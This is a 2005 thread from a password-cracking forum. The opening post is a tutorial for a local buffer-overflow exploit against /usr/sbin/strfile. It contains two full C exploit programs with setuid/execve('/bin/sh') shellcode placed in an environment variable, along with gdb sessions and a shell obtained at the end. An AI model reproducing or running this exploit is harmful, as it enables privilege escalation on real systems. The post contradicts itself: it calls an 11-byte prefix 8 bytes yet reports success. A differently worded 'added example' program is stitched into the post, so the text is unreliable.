Xisp.org Forums > Porn Password Cracking > Cracking Tutorials

IpTable
Old 01-06-2005, 09:12 AM   #1
sPlico

########################################################################################
Exploit HOWTO: Finding EXACT RET address without bruteforcing it and without using NOPs!
########################################################################################
|
| #XXXCrackers
|
+--------------------------------------------------------------------------------------+



This paper tries to show that the return address can be found exactly without bruteforcing it and without using NOPs.
We just fill up an environment variable with our shellcode, and we will find the exact address of our environment.
RET will be environment_addr+strlen(environment)+1. Let's see why and how. I will use /usr/sbin/strfile.

xxxcracker@ctb:/home/xxxcracker/work> /usr/sbin/strfile `perl -e 'printf("a"x5000);'`
Segmentation fault
xxxcracker@ctb:/home/xxxcracker/work> gdb /usr/sbin/strfile
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) r `perl -e 'printf("a"x5000);'`
Starting program: /usr/sbin/strfile `perl -e 'printf("a"x5000);'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) i esp ebp eip
Undefined info command: "esp ebp eip". Try "help info".
(gdb) i r esp ebp eip
esp 0xbfffe1c0 0xbfffe1c0
ebp 0xbfffe268 0xbfffe268
eip 0x61616161 0x61616161

Ok. Let's set the current esp as RET. Here is our exploit:
<----------BOF------------->
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>


static char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd"
"\x80\x31\xc0\xfe\xc0\xcd\x80";

#define LEN 5000
#define RET 0xbfffe1c0 /* current esp */

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
printf("\n/usr/sbin/strfile local exploit by xxxcracker\n");
fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;

setenv("xxxcracker",shellcode,1);/* exporting my environment variable, filled up with the shellcode */
execlp("/usr/sbin/strfile","strfile",buffer,NULL); /* executing the binary */
return 0;
}
<---------EOF--------------->

xxxcracker@ctb:/home/xxxcracker/work> ./strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffe1c0
Segmentation fault

Uh. We got a segfault. Let's see why! We fire up gdb:

xxxcracker@ctb:/home/xxxcracker/work> gdb strfilex
GNU gdb 20010316
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) r
Starting program: /home/xxxcracker/work/strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffe1c0

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001e10 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbfffe1c0 in ?? ()

Uh. We got nothing. Nothing at 0xbfffe1c0. Let's search for our environment:

(gdb) x/s $ebp+1000
0xbfffe620:
" "...
(gdb)
0xbfffe6e8:
" "...
(gdb)
0xbfffe7b0:
" "...
...
...
(hit enter until you see:)
0xbfffff8e: "SSH_TTY=/dev/pts/3"
(gdb)
0xbfffffa1: "LC_COLLATE=POSIX"
(gdb)
0xbfffffb2: "xxxcracker=11\027\20011.\2001Rhn/shh//bi\211RS\2111\013\2001\200" <-- BINGO! Here is our environment!
(gdb)
0xbfffffea: "/usr/sbin/strfile"
(gdb)
0xbffffffc: ""

So, our env is at 0xbfffffb2. We must skip the string "xxxcracker=" to point directly to our shellcode. The string
"xxxcracker=" is 8 bytes long, so we will add 8 bytes to 0xbfffffb2.
Here is our new exploit:

<------BOF------>

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>


static char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd"
"\x80\x31\xc0\xfe\xc0\xcd\x80";

#define LEN 5000
#define RET 0xbfffffb2+8

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;
printf("\n/usr/sbin/strfile local exploit by xxxcracker\n");
fprintf(stderr,"using address 0x%lx\n",retaddr);

for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;

setenv("xxxcracker",shellcode,1);
execlp("/usr/sbin/strfile","strfile",buffer,NULL);
return 0;
}

<---------EOF------>

Now, let's try it!

xxxcracker@ctb:/home/xxxcracker/work> gcc -o strfilex strfilex.c
xxxcracker@ctb:/home/xxxcracker/work> ./strfilex

/usr/sbin/strfile local exploit by xxxcracker
using address 0xbfffffba
sh-2.05$

Whoaaaaaaa! Cool! First try! No NOPs, no bruteforce!

iptable@unixcode.net
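Added example, not code from sPlico's post or the XXXCrackers paper: a small C program that checks the one layout fact the whole method depends on, namely that the value of an environment variable starts strlen(name)+1 bytes after the start of its "NAME=value" entry (for the name "xxxcracker" that offset is 11). It assumes a glibc or musl libc, where getenv() returns a pointer into the environ entry itself rather than a copy; DEMO_VAR and its value are constructed names. Run it twice on a system with stack ASLR and the printed entry address moves between runs, which is what makes a hard-coded return address unreliable there; a non-executable stack stops the environment payload from running even when the address is right.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The process environment as an array of "NAME=value" strings (glibc/musl). */
extern char **environ;

/* Find the "NAME=value" entry for `name`. Returns a pointer to the first
 * character of the entry (the start of NAME), or NULL when the variable
 * is not set. */
const char *env_entry(const char *name)
{
    size_t n = strlen(name);
    for (char **e = environ; *e != NULL; e++) {
        if (strncmp(*e, name, n) == 0 && (*e)[n] == '=')
            return *e;
    }
    return NULL;
}

/* Distance from the start of the entry to the first byte of its value:
 * the name, then the '=' separator. For "xxxcracker" this is 11. */
size_t env_value_offset(const char *name)
{
    return strlen(name) + 1;
}

/* Check the layout the paper relies on: the pointer getenv() hands back must
 * sit exactly env_value_offset(name) bytes past the start of the entry.
 * Returns 1 when it holds, 0 when it does not or the variable is unset. */
int env_layout_holds(const char *name)
{
    const char *entry = env_entry(name);
    const char *value = getenv(name);
    if (entry == NULL || value == NULL)
        return 0;
    return (size_t)(value - entry) == env_value_offset(name);
}

int main(int argc, char **argv)
{
    /* DEMO_VAR is a constructed name; pass another name on the command line
     * to inspect a variable that is already in the environment. */
    const char *name = (argc > 1) ? argv[1] : "DEMO_VAR";
    if (argc <= 1 && setenv(name, "constructed-value", 1) != 0) {
        perror("setenv");
        return 1;
    }
    const char *entry = env_entry(name);
    if (entry == NULL) {
        fprintf(stderr, "%s is not set\n", name);
        return 1;
    }
    /* With stack ASLR the entry address differs on every run, so a return
     * address computed from one run does not carry over to the next. */
    printf("entry %s at %p, value starts %zu bytes in, layout holds: %d\n",
           name, (const void *)entry, env_value_offset(name),
           env_layout_holds(name));
    return 0;
}
```

The offset check is deliberately done against getenv() rather than by searching the entry for '=', because the point of the paper is that the value bytes really are contiguous with the name on the stack; if a libc copied values out, the arithmetic would be meaningless even though strchr() would still find the separator.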

Old 01-25-2005, 02:28 PM   #2
lazo

thank you m8 for the information

Old 04-14-2005, 04:03 PM   #3
toniii

Very good info!! Thanks for the share.

Old 04-14-2005, 10:56 PM   #4
slysnake

I like the way you fit xxxcracker into this. ;)
__________________
"How do you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."

Old 04-15-2005, 01:42 AM   #5
ToRaZ

yes...very very good info indeed : )
what was it all about ?
__________________
Forgive, O Lord, my little jokes on Thee And I'll forgive Thy great big one on me. --Robert Frost